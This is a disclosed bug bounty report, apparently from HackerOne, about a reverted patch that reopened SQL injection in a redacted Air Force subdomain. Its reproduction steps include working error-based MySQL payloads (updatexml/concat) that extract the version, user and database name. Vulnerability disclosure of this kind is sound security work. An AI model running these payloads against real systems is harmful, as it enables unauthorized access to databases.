SQL Injection on █████
High
Vulnerability Details
#### Background:
It looks like the patch for #231338 has been reverted and this subdomain is yet again vulnerable to SQL injection.
### Summary:
An Airforce subdomain is vulnerable to SQL Injection because the application does not produce sufficient validation on user input. This allows an attacker to execute SQL queries.
### Description:
The `███=` parameter on `https://███████/█████████` does not properly sanitize ' characters, allowing an attacker to execute SQL queries!
### Impact
This could potentially expose sensitive information because an attacker could potentially dump the databases on this server!
### Step-by-step Reproduction Instructions
1.) Open Firefox or any browser
2.) Visit `https://███████/██████████=' and updatexml(null,concat(0x0a,version()),null)-- [email protected]`
3.) You will see the MySQL version in the response => `██████████`
User - `███████`
payload => `https://████████/████████████=' and updatexml(null,concat(0x0a,user()),null)-- [email protected]`
Database - `████`
payload => `https://██████/█████████████=%27%20and%20updatexml(null,concat(0x0a,database()),null)--%[email protected]`
██████
### Suggested Mitigation/Remediation Actions
Sanitize input!
Thanks!
- Corben Douglas [@sxcurity](https://twitter.com/sxcurity)
Actions
View on HackerOneReport Stats
- Report ID: 277380
- State: Closed
- Substate: resolved
- Upvotes: 18